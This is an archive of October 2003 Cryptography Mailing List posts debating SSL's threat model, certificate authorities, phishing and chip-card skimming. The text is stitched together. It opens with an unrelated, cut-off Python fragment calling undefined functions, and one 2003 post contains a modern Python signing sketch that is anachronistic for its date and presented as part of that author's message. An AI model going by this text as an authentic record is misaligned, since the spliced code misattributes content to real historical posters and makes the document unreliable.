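logo = b"\x89PNG...fake bytes for the example"
proof = issue_logo_credential(logo, "palm.com")
print(browser_accepts(logo, "palm.com", proof))         # True
print(browser_accepts(logo, "pa1m.com", proof))         # False: wrong domain
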
=

Tangentially-related point about credentials:

In a previous thread the point was made that
anonymous or pseudonymous credentials can only
say positive things.  That is, I cannot discredit
you by giving you a discredential.  You'll just
throw it away.  If I somehow discredit your
pseudonym, you'll just choose another and start
over.
This problem can be alleviated to some extent
if you can post a fiduciary bond.  Then if you
do something bad, I can demand compensation from
the agency that issued your bond.  If this
happens a lot, they may revoke your bond.  That
is, you can be discredited by losing a credential.
This means I can do business with you without
knowing your name or how to find you.  I just
need to trust the agency that issued your bond.
The agency presumably needs to know a lot about
you, but I don't.
-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-17 Thread Anne Lynn Wheeler
On Fri, 2003-10-17 at 00:58, John S. Denker wrote:
 Tangentially-related point about credentials:
 
 In a previous thread the point was made that
 anonymous or pseudonymous credentials can only
 say positive things.  That is, I cannot discredit
 you by giving you a discredential.  You'll just
 throw it away.  If I somehow discredit your
 pseudonym, you'll just choose another and start
 over.
 
 This problem can be alleviated to some extent
 if you can post a fiduciary bond.  Then if you
 do something bad, I can demand compensation from
 the agency that issued your bond.  If this
 happens a lot, they may revoke your bond.  That
 is, you can be discredited by losing a credential.
 
 This means I can do business with you without
 knowing your name or how to find you.  I just
 need to trust the agency that issued your bond.
 The agency presumably needs to know a lot about
 you, but I don't.

One can claim this is what a credit card does for the consumer ... the
name on the card is somewhat tangential to it being a credential; it is
there so that the merchant can authenticate the credential by cross
checking the name on the card with names on other credentials that you
might be carrying. If you have enough credentials with the same name ...
then it eventually satisfies the merchant that it is your credential.

Some number of places are taking the name off the card ... as part of
improving consumer privacy at point-of-sale. They can do this with debit
... where the PIN is a substitute for otherwise proving it is your
credential. However, as previously posted, there is a lot of skimming
going on, with the information for making a counterfeit card being
captured, as well as the corresponding PIN being scarfed up.

This is also being done with some kinds of chip cards ... where a PIN
is involved ... but since the infrastructure trusts the cards ...
the counterfeit cards are programmed to accept any PIN ... see the "yes
card" at the bottom of the following URL.
http://www.smartcard.co.uk/resources/articles/cartes2002.html
The issue is that the technique used to skim static data for making
counterfeit magstripe cards also applies to skimming static data for
making counterfeit "yes cards".

The claim in X9.59 is that the signature from something like an asuretee
card ... can both demonstrate two (or three) factor authentication and
prove that the transaction hasn't been tampered with since it
was signed.

In this case, while the card may still look like an (offline) credential
from pre-1970s (with printed credential revocation lists mailed out
every month to all merchants) ... it, in fact, does an online
transaction. The digital signature proving 2/3 factor authentication
(and no transaction tampering during transit) is then accepted (or not)
by the financial institution, which reports the real-time result back to the
relying party (merchant).

This is a move from the ancient offline paradigm that has been going on
for hundreds of years (with credentials as substitute for real-time
interaction) to an online paradigm. While the form-factor may still
appear the same as the rapidly becoming obsolete offline credential; it
is actually operating as a long-distance 2/3 factor authentication
mechanism between the consumer and their financial institution ... with
the merchant/relying-party getting back a real-time response as to
whether the institution stands behind the request. 

The difference between the x9.59/asuretee implementation and the "yes
card" implementation is that there is no static data to skim (and use
for creating counterfeit cards/transactions).
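
The shape of that idea, illustrated in Python with an assumed Ed25519 card
key (this is not the actual X9.59 message format, just a sketch): the card
signs the transaction itself, so there is no static data worth skimming
and nothing that replays.

# Sketch of a signed transaction: a skimmer captures nothing replayable,
# and any tampering in transit breaks the signature.
import os
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric import ed25519

card_key = ed25519.Ed25519PrivateKey.generate()      # lives inside the chip
issuer_copy_of_pub = card_key.public_key()           # registered with the issuer

def sign_transaction(amount_cents: int, merchant: str) -> tuple[bytes, bytes]:
    tx = f"{amount_cents}|{merchant}|{os.urandom(8).hex()}".encode()  # nonce stops replay
    return tx, card_key.sign(tx)

def issuer_approves(tx: bytes, sig: bytes) -> bool:
    try:
        issuer_copy_of_pub.verify(sig, tx)            # online, real-time check
        return True
    except InvalidSignature:
        return False

tx, sig = sign_transaction(4999, "example-merchant")
print("approved" if issuer_approves(tx, sig) else "declined")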

misc. x9.59 refs:
http://www.garlic.com/~lynn/index.html#x959

misc. aads chip strawman  asuretee refs:
http://www.garlic.com/~lynn/index.html#aads


The integrity of the chipcard and the integrity of the digital signature
substitutes for requiring the merchants to cross-check the name on the
card with the names on an arbitrary number of other credentials until
they are comfortable performing the transaction. 

The current (non-PIN card) infrastructure is sort of half way between
the old style "everything is a credential" and the new "everything is
online" ... that is, half way to a fully trusted online infrastructure. The magstripe
does an online transaction and the institution will approve the
transactions with some number of caveats regarding it not being a
counterfeit/fraudulent transaction. For non-PIN transactions, the
merchant can use the name on the card to cross check against as many
other credential names as needed, until the merchant becomes comfortable.

This is similar to the scenario with the existing SSL domain name
certificate issuing process (using names mapping to common/real-world
identities in order to achieve authentication). The domain name system
registers the owner's name. The CA SSL certificate issuer obtains a name 
from the certificate requester ... and then the CA attempts to map the 
two names to the same real-world identity as a means of achieving 
authentication.

Re: WYTM?

2003-10-16 Thread Ian Grigg
Jon Snader wrote:
 
 On Mon, Oct 13, 2003 at 06:49:30PM -0400, Ian Grigg wrote:
  Yet others say to be sure we are talking
  to the merchant.  Sorry, that's not a good
  answer either because in my email box today
  there are about 10 different attacks on the
  secure sites that I care about.  And mostly,
  they don't care about ... certs.  But they
  care enough to keep doing it.  Why is that?
 
 
 I don't understand this.  Let's suppose, for the
 sake of argument, that MitM is impossible.  It's
 still trivially easy to make a fake site and harvest
 sensitive information.


Yes.  This is the attack that is going on.  This
is today's threat.  (In that it is a new threat.
The old threat still exists - hack the node.)


 If we assume (perhaps erroneously)
 that all but the most naive user will check that they
 are talking to a ``secure site'' before they type in
 that credit card number, doesn't the cert provide assurance
 that you're talking to whom you think you are?


Nope.  It would seem that only the more sophisticated
users can be relied upon to correctly check that they
are at the correct secure site.  In practice almost
all of these attacks bypass any cert altogether and
do not use an SSL protected HTTPS site.

They use a variety of techniques to distract the
attention of the user, some highly imaginative.

For example, if you target the right browser, then it
is possible to pop up a box that covers the appropriate
parts.  Or to put a display inside the window that
duplicates the browser display.  Or the URL is one
of those with strange features in there or funny
letters that look like something else.

In practice, these attacks are all statistical;
they look close enough, and they fool some of the
people some of the time.

Finally, just in the last month, they have also
started doing actual cert spoofs.  It was quite
exciting to me to see a spoof site using a cert,
so I went in and followed it.  Hey presto, it
showed me the cert and said it was wrong!  So
I clicked on the links and tried to see what was
wrong.

Here's the interesting thing:  I couldn't easily
tell, and my first diagnosis was wrong.  So then
I realised that *even* if the spoof is using a
cert, the victim falls to a confusion attack (see
Tom Weinstein's comments on bad GUIs).

(But, for the most part, 95% or so ignore the cert,
and the user may or may not notice.)

Now, we have no statistics on how many of these
attacks work, other than the following:  they keep
happening, and with increasing frequency over time.

From this I conclude they are working, enough to
justify the cost of the attack at least.

I guess the best thing to say is that the raw
claim that the cert ensures that you are talking
to the merchant is not 100% true.  It will help
a sophisticated user.  An attack will bypass some
of the users a lot.  It might fool many of the
users only occasionally.


 If the argument is that Verisign and the others don't do
 enough checking before issuing the cert, I don't see
 how that somehow means that SSL is flawed.


SSL isn't flawed, per se.  It's just not appropriately
being used in the secure browser application.  It's
fair to say that its use is misaligned to requirements,
and a lot of things could be done to improve matters.

But, one of the perceptions that exist in the browser
world is that SSL secures ecommerce.  Until that view
is rectified, we can't really build the consensus to
have efforts like Ye & Smith, and Close, and others,
be treated as serious and desirable.

(In practice, I don't think it matters how Verisign
and others check the cert.  This is shown by the
fact that almost all of these attacks have bypassed
the cert altogether.)

iang

http://www.iang.org/ssl/maginot_web.html

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-16 Thread Bryce O'Whielacronx

Hopefully everyone realizes this, but just for the record, I didn't write the 
lines apparently attributed to me below -- I was quoting Bruce Schneier.

By the way, I strongly agree with David Honig's point that the wrong entities 
are doing the signing.

Regards,

Bryce O'Whielacronx

 David Honig [EMAIL PROTECTED] wrote:

 At 01:51 PM 10/16/03 -0400, Bryce O'Whielacronx wrote:
   I doubt it.  It's true that VeriSign has certified this
   man-in-the-middle attack, but no one cares.
 
 Indeed, it would make sense for the original vendor website (eg Palm)
 to have signed the MITM site's cert (palmorder.modusmedia.com),
 not for Verisign to do so.  Even better, for Mastercard to have signed
 both Palm and palmorder.modusmedia.com as well.  And Mastercard to
 have printed its key's signature in my monthly paper bill.
 
 
 (This is aside your main point about it being Mastercard et al. 
 doing the checking/backup for the customer, not certs.)
 
 
 
 
 

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-15 Thread Ian Grigg
Eric Rescorla wrote:
 
 Ian Grigg [EMAIL PROTECTED] writes:
  I'm sorry, but, yes, I do find great difficulty
  in not dismissing it.  Indeed being other than
  dismissive about it!
 
  Cryptography is a special product, it may
  appear to be working, but that isn't really
  good enough.  Coincidence would lead us to
  believe that clear text or ROT13 were good
  enough, in the absence of any attackers.
 
  For this reason, we have a process.  If the
  process is not followed, then coincidence
  doesn't help to save our bacon.

 Disagree. Once again, SSL meets the consensus threat
 model. It was designed that way partly unconsciously,
 partly due to inertia, and partly due to bullying by
 people who did have the consensus threat model in mind.


(If you mean that the ITM is consensus, I grant
you that two less successful protocols follow
it - S/MIME and IPSec (partly) but I don't
think that makes it consensus.  I know there
are a lot of people who don't think in any other
terms than this model, and that is the issue!
There are also a lot of people who think in
terms completely opposed to ITM.

So to say that ITM is consensus is something
that is going to have to be established.

If that's not what you mean, can you please
define?)


 That's not the design process I would have liked,
 but it's silly to say that a protocol that matches
 the threat model is somehow automatically the wrong
 thing just because the designers weren't as conscious
 as one would have liked.


I'm not sure I ever said that the protocol
doesn't match the threat model - did I?  What
I should have said and hoped to say was that
the protocol doesn't match the application.

I don't think I said automatically, either.
I did hold out hope in that rant of mine that
the designers could have accidentally got it
right.  But, they didn't.

Now, SSL, by itself, within the bounds of the
ITM is actually probably pretty good.  By all
reports, if you want ITM, then SSL is your
best choice.

But, we have to be very careful to understand
that any protocol has a given set of characteristics,
and its applicability to an application is an
uncertain thing;  hence the process of the threat
model and the security model.  In SSL's case, one
needs to say "use SSL, but only if your threat
model is close to ITM."  Or similar.  Hence the
title of this rant.

The error of the past has been that too many
people have said something like "Use SSL, because
we already got it right."  Which, unfortunately,
skips the whole issue of what threat model one
is dealing with.  Just like happened with secure
browsing.

In this case, the ITM was a) agreed upon after
the fact to fill in the hole, and b) not the right
one for the application.


   And on the client side the user can, of course, click ok to the do
   you want to accept this cert dialog. Really, Ian, I don't understand
   what it is you want to do. Is all you're asking for to have that
   dialog worded differently?
 
 
  There should be no dialogue at all.  Going from
  HTTP to HTTPS/self signed is a mammoth increase
  in security.  Why does the browser say it is
  less/not secure?
 Because it's giving you a chance to accept the certificate,
 and letting you know in case you expected a real cert that
 you're not getting one.


My interpretation - which you won't like - is that
it is telling me that this certificate is bad, and
asking whether me if I am sure I want to do this.

A popup is synonymous with bad news.  It shouldn't be
used for good news.  As a general theme, that is,
although this is the reason I cited that paper:  others
have done work on this and they are a long way ahead
in their thinking, far beyond me.


   It's not THAT different from what
   SSH pops up.
 
 
  (Actually, I'm not sure what SSH pops up, it's
  never popped up anything to me?  Are you talking
  about a windows version?)
 SSH in terminal mode says:
 
 The authenticity of host 'hacker.stanford.edu (171.64.78.90)' can't be established.
 RSA key fingerprint is d3:a8:90:6a:e8:ef:fa:43:18:47:4c:02:ab:06:04:7f.
 Are you sure you want to continue connecting (yes/no)? 
 
 I actually find the Firebird popup vastly more understandable
 and helpful.


I'm not sure I can make much of your point,
as I've never heard of nor seen a Firebird?


iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


WYTM?

2003-10-13 Thread Ian Grigg
As many have decried in recent threads, it all
comes down to WYTM - What's Your Threat Model.

It's hard to come up with anything more important
in crypto.  It's the starting point for ... every-
thing.  This seems increasingly evident because we
haven't successfully reverse-engineered the threat
model for the Quantum crypto stuff, for the Linux
VPN game, and for Tom's qd channel security.

Which results in, at best, a sinking feeling, or
at worst, endless arguments as to whether we are
dealing with yet another a hype cycle, yet another
practically worthless crypto protocol, yet another
newbie leading users on to disaster through belief
in simple, hidden, insecure factors, or...

WYTM?

It's the first question, and I've thought it about
a lot in the context of SSL.  This rant is about
what I've found.  Please excuse the weak cross over!



For $40, you can pick up SSL & TLS by Eric
Rescorla [1].  It is about as close as I could
get to finding serious commentary on the threat
model for SSL [2].

The threat model is in Section 1.2, and the reader
might like to run through that, in the flesh, here:

  http://www.iang.org/ssl/rescorla_1.html

perhaps for the benefit of at least one unbiased
reading.  Please, read it.  I typed it in by hand,
and my fingers want to know it was worth it [3].

The rest of this rant is about what the Threat
model says, in totally biased, opinionated terms
[4].  My commentary rails on the left, the book
composes centermost.



  1.2  The Internet Threat Model

  Designers of Internet security protocols
  typically share a more or less common
  threat model.  

Eric doesn't say so explicitly, but this is pretty
much the SSL threat model.  Here comes the first
key point:

  First, it's assumed that the actual end
  systems that the protocol is being
  executed on are secure

(And then some testing of that claim.  To round
this out, let's skip to the next paragraph:)

  ... we assume that the attacker has more or
  less complete control of the communications
  channel between any two machines. 



Ladies and Gentlemen, there you have it.  The
Internet Threat Model (ITM), in a nutshell, or,
two nutshells, if we are using those earlier two
sentence models.

It's a strong model:  the end nodes are secure and
the middle is not.  It's clean, it's simple, and
we just happen to have a solution for it.



Problem is, it's also wrong.  The end systems
are not secure, and the comms in the middle is
actually remarkably safe.

(Whoa!  Did he say that?)  Yep, I surely did: the
systems are insecure, and, the wire is safe.

Let's quantify that:  Windows.  Is most of the
end systems (and we don't need to belabour that
point).  Are infected with viruses, hacks, macros,
configuration tools, passwords, Norton recovery
tools, my kid sister...

And then there's Linux.  13,000 boxen hacked per
month... [5].  In fact, Linux beats Windows 4 to 1
and it hasn't even challenged the user's desktop
market yet!

It shows in the statistics, it shows in experience;
pretty much all of us have seen a cracked box at
close quarters at one point or another [6].

Windows systems are perverted in their millions by
worms, viruses, and other upgrades to the social
networking infrastructure.  Linux systems aren't
much more trust-inspiring, on the face of it.

Pretty much all of us present in this forum would
feel fairly confident about downloading some sort
of crack disc, walking into a public library and
taking over one of their machines.

Mind you... in that same library, could we walk
in and start listening to each other's comms?

Nope.  Probably not.

On the one hand, we'd have trouble on the cables,
without being spotted by that pesky librarian.
And those darn $100 switches, they so ruin the
party these days.

Admittedly, OTOH, we do have that wonderful 802.11b
stuff and there we can really listen in [7].

But, in practice, we can conclude, nobody much
listens to our traffic.  Really, so close to nobody
that nobody in reality worries about it [8].

But, every sumbitch is trying to hack into our
machine, everyone has a virus scanner, a firewall,
etc etc.  I'm sure we've all shared that weird
feeling when we install a new firewall that
notifies when your machine is being port scanned?
A new machine can be put on a totally new IP, and
almost immediately, ports are being scanned

How do they do that so fast?



Hence the point:  the comms is pretty darn safe.
And the node is in trouble.  We might have trouble
measuring it, but we can assert this fact:

the node is way more insecure than the comms.

That's a good enough assumption for now;  which
takes us back to the so-called Internet Threat
Model and by extension and assumption, the SSL
threat model:

the actual end systems ... are secure.
  the attacker has more or less complete
 control of the communications channel between
 any two machines.

Quite the reverse pertains [5].  So where does

Re: WYTM?

2003-10-13 Thread Ian Grigg
Minor errata:

Eric Rescorla wrote:
  I totally agree that the systems are
 insecure (obligatory pitch for my Internet is Too
 Secure Already) http://www.rtfm.com/TooSecure.pdf,

I found this link has moved to here:

http://www.rtfm.com/TooSecure-usenix.pdf

 which makes some of the same points you're making,
 though not all.

iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-13 Thread Tim Dierks
At 12:28 AM 10/13/2003, Ian Grigg wrote:
Problem is, it's also wrong.  The end systems
are not secure, and the comms in the middle is
actually remarkably safe.
I think this is an interesting, insightful analysis, but I also think it's 
drawing a stronger contrast between the real world and the Internet threat 
model than is warranted.

It's true that a large number of machines are compromised, but they were 
generally compromised by malicious communications that came over the 
network. If correctly implemented systems had protected these machines from 
untrustworthy Internet data, they wouldn't have been compromised.

Similarly, the statement is true at large (many systems are compromised), 
but not necessarily true in the small (I'm fairly confident that my SSL 
endpoints are not compromised). This means that the threat model is valid 
for individuals who take care to make sure that they comply with its 
assumptions, even if it may be less valid for the Internet at large.

And it's true that we define the threat model to be as large as the problem 
we know how to solve: we protect against the things we know how to protect 
against, and don't address problems at this level that we don't know how to 
protect against at this level. This is no more incorrect than my buying 
clothes which will protect me from rain, but failing to consider shopping 
for clothes which will do a good job of protecting me from a nuclear blast: 
we don't know how to make such clothes, so we don't bother thinking about 
that risk in that environment. Similarly, we have no idea how to design a 
networking protocol to protect us from the endpoints having already been 
compromised, so we don't worry about that part of the problem in that 
space. Perhaps we worry about it in another space (firewalls, better OS 
coding, TCPA, passing laws).

So, I disagree: I don't think that the SSL model is wrong: it's the right 
model for the component of the full problem it looks to address. And I 
don't think that the Internet threat model has failed to address the 
problem of host compromise: the fact is that these host compromises 
resulted, in part, from the failure of operating systems and other software 
to adequately protect against threats described in the Internet threat 
model: namely, that data coming in over the network cannot be trusted.

That doesn't change the fact that we should worry about the risk in 
practice that those assumptions of endpoint security will not hold.

 - Tim

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]


Re: WYTM?

2003-10-13 Thread Ian Grigg
Eric,

thanks for your reply!

My point is strictly limited to something
approximating "there was no threat model
for SSL / secure browsing."  And, as you
say, you don't really disagree with that
100% :-)

With that in mind, I think we agree on this:


  [9] I'd love to hear the inside scoop, but all I
  have is Eric's book.  Oh, and for the record,
  Eric wasn't anywhere near this game when it was
  all being cast out in concrete.  He's just the
  historian on this one.  Or, that's the way I
  understand it.
 
 Actually, I was there, though I was an outsider to the
 process. Netscape was doing the design and not taking much
 input. However, they did send copies to a few people and one
 of them was my colleague Allan Schiffman, so I saw it.

OK!

 It's really a mistake to think of SSL as being designed
 with an explicit threat model. That just wasn't how the
 designers at Netscape thought, as far as I can tell.


Well, that's the sort of confirmation I'm looking
for.  From the documents and everything, it seems
as though the threat model wasn't analysed, it was
just picked out of a book somewhere.  Or, as you
say, even that is too kind, they simply didn't
think that way.

But, this is a very important point.  It means that
when we talk about secure browsing, it is wrong to
defend it on the basis of the threat model.  There
was no threat model.  What we have is an accident
of the past.

Which is great.  This means there is no real objection
to building a real threat model.  One more appropriate
to the times, the people, the applications, the needs.

And the today-threats.  Not the bogeyman threats.


 Incidentally, Ian, I'd like to propose a counterargument
 to your argument. It's true that most web traffic
 could be encrypted if we had a more opportunistic key
 exchange system. But if there isn't any substantial
 sniffing (i.e. the wire is secure) then who cares?


Exactly.  Why do I care?  Why do you care?

It is mantra in the SSL community and in the
browsing world that we do care.  That's why
the software is arranged in a double lock-
in, between the server and the browser, to
force use of a CA cert.

So, if we don't care, why do we care?  What
is the reason for doing this?  Why are we
paying to use free software?  What paycheck
does Ben draw from all our money being spent
on this "I don't care" thing called a cert?

Some people say because of the threat model.

And that's what this thread is about:  we
agree that there is no threat model, in any
proper sense.  So this is a null and void
answer.

Other people say to protect against MITM.
But, as we've discussed at length, there is
little or no real or measurable threat of MITM.

Yet others say to be sure we are talking
to the merchant.  Sorry, that's not a good
answer either because in my email box today
there are about 10 different attacks on the
secure sites that I care about.  And mostly,
they don't care about ... certs.  But they
care enough to keep doing it.  Why is that?



Someone made a judgement call, 9 or so years
ago, and we're still paying for that person
caring on our behalf, erroneously.

Let's not care anymore.  Let's stop paying.

I don't care who it was, even.  I just want
to stop paying for this person, caring for me.

Let's start making our own security choices?

Let crypto run free!

iang

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]